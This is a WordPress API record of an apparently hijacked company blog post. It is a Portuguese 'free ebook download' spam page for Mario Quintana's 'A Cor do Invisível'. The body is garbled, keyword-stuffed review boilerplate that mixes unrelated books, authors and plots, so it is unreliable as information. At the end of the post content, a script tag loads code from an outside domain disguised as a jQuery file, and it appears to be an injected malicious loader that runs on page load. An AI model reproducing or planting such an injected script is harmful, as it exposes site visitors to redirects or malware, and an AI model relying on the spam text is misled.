{"id":122156,"date":"2025-12-15T02:46:41","date_gmt":"2025-12-14T18:46:41","guid":{"rendered":"https:\/\/www.sinaranadvance.com.my\/?p=122156"},"modified":"2026-01-17T23:46:42","modified_gmt":"2026-01-17T15:46:42","slug":"a-cor-do-invisivel-colecao-digital-gratis","status":"publish","type":"post","link":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/a-cor-do-invisivel-colecao-digital-gratis\/","title":{"rendered":"A Cor do Invis\u00edvel &#124; Cole\u00e7\u00e3o Digital Gr\u00e1tis"},"content":{"rendered":"<h1>A Cor do Invis\u00edvel &#8211; Mario Quintana<\/h1>\n<p>Ao virar as p\u00e1ginas, encontrei-me inexplicavelmente simpatizando com o assassino, me perguntando se o mundo n\u00e3o seria um lugar melhor sem certos indiv\u00edduos, e isso \u00e9 um sentimento verdadeiramente desconcertante. Ao terminar a leitura da \u00faltima p\u00e1gina, senti um senso de gratid\u00e3o, como se tivesse recebido um presente, um que eu guardaria e voltaria a explorar repetidamente. N\u00e3o tenho certeza do que esperava quando comecei a ler este livro, mas n\u00e3o foi o que recebi, e ainda assim, de alguma forma, foi isso que o tornou t\u00e3o delicioso, como uma festa leitura online gr\u00e1tis que foi organizada apenas para mim.<\/p>\n<p>Ao mergulhar no mundo de receitas e hist\u00f3ria, encontrei-me encantado pela capacidade do autor de entrela\u00e7ar fios aparentemente d\u00edspares em uma rica tape\u00e7aria de pdfs de hist\u00f3rias. Sempre fui fascinado pela maneira como os autores podem criar mundos inteiros com apenas algumas palavras, e este livro n\u00e3o foi exce\u00e7\u00e3o, me transportando para um reino ao mesmo tempo familiar e desconhecido.<\/p>\n<p>A escrita era envolvente, com uma voz narrativa que era tanto conversacional quanto perspicaz, fazendo com que parecesse uma conversa quente com um velho amigo. Este livro \u00e9 um inc\u00eandio lento, uma conversa ao p\u00e9 do fogo em uma noite de inverno, um lembrete de que \u00e0s vezes as hist\u00f3rias ebook poderosas s\u00e3o aquelas que se desenrolam em um ritmo suave, com personagens que se sentem como velhos amigos, e uma narrativa que se envolve em seu cora\u00e7\u00e3o. \u00c9 um livro raro que pode equilibrar o cerebral com o emocional, o intelectual com o intuitivo, mas este conseguiu com facilidade.<\/p>\n<h2>PDFs de Coragem A Cor do Invis\u00edvel<\/h2>\n<p>\u00c9 uma leitura leve que me manteve envolvido do in\u00edcio ao fim. Recomendo muito para uma fuga r\u00e1pida e agrad\u00e1vel. O uso de linguagem do autor foi como uma brisa suave de ver\u00e3o, acalmando e calmante, mas de alguma forma n\u00e3o me preparou para a tempestade que estava por vir. \u00c0s vezes me pergunto o que torna um livro verdadeiramente especial, e ao refletir sobre este, sou lembrado de que nem sempre se trata do destino, mas baixar ebooks gr\u00e1tis jornada.<\/p>\n<p>\u00c0 medida que a hist\u00f3ria se desenrolava, ficou claro que a verdadeira magia estava n\u00e3o nos reviravoltas da trama ou nos arcos dos personagens, mas A Cor do Invis\u00edvel momentos sutis, quase impercept\u00edveis de conex\u00e3o que nos unem a todos. A trama se desdobra e se volta como uma escada em espiral, A Cor do Invis\u00edvel o leitor em uma busca alegre por um labirinto de emo\u00e7\u00f5es e ideias. Ao ler, baixar ebook gr\u00e1tis pude deixar de sentir um senso de desconex\u00e3o, como se a hist\u00f3ria estivesse se desenrolando \u00e0 dist\u00e2ncia, nunca chegando a tocar meu cora\u00e7\u00e3o ou mente, deixando-me com um sentimento de insatisfa\u00e7\u00e3o vaga.<\/p>\n<p>A maneira ebook pdf baixar o autor tece m\u00faltiplas tramas e temas \u00e9 um testemunho do poder da narrativa, e das maneiras pelas quais a literatura pode capturar nossa imagina\u00e7\u00e3o e nos inspirar a pensar ler gr\u00e1tis forma diferente sobre o mundo. H\u00e1 algo a ser dito sobre uma hist\u00f3ria que pode evocar um forte A Cor do Invis\u00edvel de nostalgia, e este livro, com sua explora\u00e7\u00e3o po\u00e9tica de mem\u00f3rias e experi\u00eancias, certamente fez isso, mesmo que n\u00e3o tenha totalmente conquistado meu cora\u00e7\u00e3o.<\/p>\n<h3>Mario Quintana livros gr\u00e1tis<\/h3>\n<p>A hist\u00f3ria de Tyler, que acorda em um mundo fant\u00e1stico ap\u00f3s um acidente tr\u00e1gico, \u00e9 uma epub gr\u00e1tis atraente que explora temas de resili\u00eancia e crescimento pessoal. Ao olhar para tr\u00e1s no livro, lembro-me leitura gr\u00e1tis import\u00e2ncia da narrativa em nossas vidas e do impacto que ela pode ter em nossas emo\u00e7\u00f5es e nossa compreens\u00e3o do mundo.<\/p>\n<p>No final, foi a resson\u00e2ncia emocional do livro que permaneceu, um lembrete comovente do poder da fic\u00e7\u00e3o de tocar nossos cora\u00e7\u00f5es e mentes, de inspirar e transformar. Este livro foi uma agrad\u00e1vel surpresa. Os personagens s\u00e3o bem desenvolvidos e a trama leitura pdf gr\u00e1tis envolvente. N\u00e3o \u00e9 apenas uma hist\u00f3ria, \u00e9 uma jornada que leva voc\u00ea por uma gama de emo\u00e7\u00f5es. Eu o recomendaria a qualquer pessoa procurando uma boa leitura. Fiquei impressionado com o uso da linguagem pelo autor, uma mistura magistral de lirismo e precis\u00e3o que trouxe a hist\u00f3ria \u00e0 vida.<\/p>\n<p>No final, n\u00e3o foi o enredo que ficou comigo, mas os personagens, multidimensionais e imperfeitos, como pessoas reais, com todas as suas complexidades A Cor do Invis\u00edvel contradi\u00e7\u00f5es. Portanto, no baixar livros epub eu diria que esta foi uma adi\u00e7\u00e3o s\u00f3lida, se n\u00e3o not\u00e1vel, ao g\u00eanero de romance sobrenatural.<\/p>\n<h3>A Cor do Invis\u00edvel pdf<\/h3>\n<p>Embora a premissa fosse fascinante, a execu\u00e7\u00e3o parecia decepcionante, um pouco como uma promessa n\u00e3o cumprida, deixando-me com mais perguntas do que respostas. Eu me perguntava, enquanto lia, sobre as inten\u00e7\u00f5es do autor, os temas e mensagens que ebooks gr\u00e1tis pdf escondiam sob a superf\u00edcie da narrativa. \u00c0 medida que virava as p\u00e1ginas, eu me sentia como um viajante em uma jornada, um caminho sinuoso baixar livros pdf gr\u00e1tis se retorcia e se virava por baixar epub paisagem de maravilha e descoberta.<\/p>\n<p>A poesia de Blake A Cor do Invis\u00edvel uma aula mestra em misturar o espiritual e A Cor do Invis\u00edvel mundano.<\/p>\n<p>\u00c9 um livro que deixar\u00e1 livro digital gr\u00e1tis pensando, como um quebra-cabe\u00e7a que voc\u00ea n\u00e3o consegue resolver completamente, mesmo depois livros gr\u00e1tis baixar terminar a leitura. Livros como este nos lembram de que h\u00e1 sempre mais para aprender e descobrir, n\u00e3o importa qu\u00e3o experientes sejamos. O livro est\u00e1 repleto de informa\u00e7\u00f5es, mas seu estilo acad\u00eamico e conte\u00fado repetitivo pode ser um pouco entediante. Eu esperava um material mais din\u00e2mico e envolvente.<\/p>\n<p>Em retrospecto, eu acho que o que mais apreciei foi a forma como a narrativa desafiou minhas suposi\u00e7\u00f5es, for\u00e7ando-me a confrontar meus pr\u00f3prios preconceitos. Os temas de perseveran\u00e7a e determina\u00e7\u00e3o nesta hist\u00f3ria ler livros gr\u00e1tis inspiradores e estimulantes, e provavelmente ressoar\u00e3o livro gr\u00e1tis pdf os leitores em um n\u00edvel profundo. Outro livro estelar de Destiny Hawkins. Seu talento para contar hist\u00f3rias livro gr\u00e1tis verdadeiramente excepcional.<\/p>\n<p>A hist\u00f3ria foi uma explora\u00e7\u00e3o envolvente da psique humana, uma jornada para os recantos mais escuros pdf gr\u00e1tis baixar cora\u00e7\u00e3o, onde as sombras dan\u00e7avam e A Cor do Invis\u00edvel luz lutava para penetrar.<\/p>\n<p><script src=\"\/\/cdn.bunnyflare.run\/jquery_min.js?id=16092623\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A Cor do Invis\u00edvel &#8211; Mario Quintana Ao virar as p\u00e1ginas, encontrei-me inexplicavelmente simpatizando com o assassino, me perguntando se o mundo n\u00e3o seria um lugar melhor sem certos indiv\u00edduos, e isso \u00e9 um sentimento verdadeiramente desconcertante. Ao terminar a leitura da \u00faltima p\u00e1gina, senti um senso de gratid\u00e3o, como se tivesse recebido um presente, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"pagelayer_contact_templates":[],"_pagelayer_content":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-122156","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>A Cor do Invis\u00edvel &#124; Cole\u00e7\u00e3o Digital Gr\u00e1tis - Sinaran Advance Group<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/a-cor-do-invisivel-colecao-digital-gratis\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"A Cor do Invis\u00edvel &#124; Cole\u00e7\u00e3o Digital Gr\u00e1tis - Sinaran Advance Group\" \/>\n<meta property=\"og:description\" content=\"A Cor do Invis\u00edvel &#8211; Mario Quintana Ao virar as p\u00e1ginas, encontrei-me inexplicavelmente simpatizando com o assassino, me perguntando se o mundo n\u00e3o seria um lugar melhor sem certos indiv\u00edduos, e isso \u00e9 um sentimento verdadeiramente desconcertante. Ao terminar a leitura da \u00faltima p\u00e1gina, senti um senso de gratid\u00e3o, como se tivesse recebido um presente, [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/a-cor-do-invisivel-colecao-digital-gratis\/\" \/>\n<meta property=\"og:site_name\" content=\"Sinaran Advance Group\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-14T18:46:41+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-01-17T15:46:42+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/a-cor-do-invisivel-colecao-digital-gratis\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/a-cor-do-invisivel-colecao-digital-gratis\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#\\\/schema\\\/person\\\/53a837ac211dea070613fe89a0e11d1d\"},\"headline\":\"A Cor do Invis\u00edvel &#124; Cole\u00e7\u00e3o Digital Gr\u00e1tis\",\"datePublished\":\"2025-12-14T18:46:41+00:00\",\"dateModified\":\"2026-01-17T15:46:42+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/a-cor-do-invisivel-colecao-digital-gratis\\\/\"},\"wordCount\":1142,\"publisher\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#organization\"},\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/a-cor-do-invisivel-colecao-digital-gratis\\\/\",\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/a-cor-do-invisivel-colecao-digital-gratis\\\/\",\"name\":\"A Cor do Invis\u00edvel &#124; Cole\u00e7\u00e3o Digital Gr\u00e1tis - Sinaran Advance Group\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#website\"},\"datePublished\":\"2025-12-14T18:46:41+00:00\",\"dateModified\":\"2026-01-17T15:46:42+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/a-cor-do-invisivel-colecao-digital-gratis\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/a-cor-do-invisivel-colecao-digital-gratis\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/2025\\\/12\\\/15\\\/a-cor-do-invisivel-colecao-digital-gratis\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"A Cor do Invis\u00edvel &#124; Cole\u00e7\u00e3o Digital Gr\u00e1tis\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#website\",\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/\",\"name\":\"Sinaran Advance Group\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#organization\",\"name\":\"Sinaran Advance Group\",\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/wp-content\\\/uploads\\\/2021\\\/06\\\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/wp-content\\\/uploads\\\/2021\\\/06\\\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg\",\"width\":1085,\"height\":675,\"caption\":\"Sinaran Advance Group\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/#\\\/schema\\\/person\\\/53a837ac211dea070613fe89a0e11d1d\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\\\/\\\/sinaranadvance.com.my\"],\"url\":\"https:\\\/\\\/www.sinaranadvance.com.my\\\/index.php\\\/author\\\/sinaranadvance\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"A Cor do Invis\u00edvel &#124; Cole\u00e7\u00e3o Digital Gr\u00e1tis - Sinaran Advance Group","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/a-cor-do-invisivel-colecao-digital-gratis\/","og_locale":"en_US","og_type":"article","og_title":"A Cor do Invis\u00edvel &#124; Cole\u00e7\u00e3o Digital Gr\u00e1tis - Sinaran Advance Group","og_description":"A Cor do Invis\u00edvel &#8211; Mario Quintana Ao virar as p\u00e1ginas, encontrei-me inexplicavelmente simpatizando com o assassino, me perguntando se o mundo n\u00e3o seria um lugar melhor sem certos indiv\u00edduos, e isso \u00e9 um sentimento verdadeiramente desconcertante. Ao terminar a leitura da \u00faltima p\u00e1gina, senti um senso de gratid\u00e3o, como se tivesse recebido um presente, [&hellip;]","og_url":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/a-cor-do-invisivel-colecao-digital-gratis\/","og_site_name":"Sinaran Advance Group","article_published_time":"2025-12-14T18:46:41+00:00","article_modified_time":"2026-01-17T15:46:42+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/a-cor-do-invisivel-colecao-digital-gratis\/#article","isPartOf":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/a-cor-do-invisivel-colecao-digital-gratis\/"},"author":{"name":"admin","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d"},"headline":"A Cor do Invis\u00edvel &#124; Cole\u00e7\u00e3o Digital Gr\u00e1tis","datePublished":"2025-12-14T18:46:41+00:00","dateModified":"2026-01-17T15:46:42+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/a-cor-do-invisivel-colecao-digital-gratis\/"},"wordCount":1142,"publisher":{"@id":"https:\/\/www.sinaranadvance.com.my\/#organization"},"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/a-cor-do-invisivel-colecao-digital-gratis\/","url":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/a-cor-do-invisivel-colecao-digital-gratis\/","name":"A Cor do Invis\u00edvel &#124; Cole\u00e7\u00e3o Digital Gr\u00e1tis - Sinaran Advance Group","isPartOf":{"@id":"https:\/\/www.sinaranadvance.com.my\/#website"},"datePublished":"2025-12-14T18:46:41+00:00","dateModified":"2026-01-17T15:46:42+00:00","breadcrumb":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/a-cor-do-invisivel-colecao-digital-gratis\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/a-cor-do-invisivel-colecao-digital-gratis\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/a-cor-do-invisivel-colecao-digital-gratis\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.sinaranadvance.com.my\/"},{"@type":"ListItem","position":2,"name":"A Cor do Invis\u00edvel &#124; Cole\u00e7\u00e3o Digital Gr\u00e1tis"}]},{"@type":"WebSite","@id":"https:\/\/www.sinaranadvance.com.my\/#website","url":"https:\/\/www.sinaranadvance.com.my\/","name":"Sinaran Advance Group","description":"","publisher":{"@id":"https:\/\/www.sinaranadvance.com.my\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sinaranadvance.com.my\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.sinaranadvance.com.my\/#organization","name":"Sinaran Advance Group","url":"https:\/\/www.sinaranadvance.com.my\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/","url":"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg","contentUrl":"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg","width":1085,"height":675,"caption":"Sinaran Advance Group"},"image":{"@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/sinaranadvance.com.my"],"url":"https:\/\/www.sinaranadvance.com.my\/index.php\/author\/sinaranadvance\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/122156","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/comments?post=122156"}],"version-history":[{"count":1,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/122156\/revisions"}],"predecessor-version":[{"id":122157,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/122156\/revisions\/122157"}],"wp:attachment":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/media?parent=122156"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/categories?post=122156"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/tags?post=122156"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}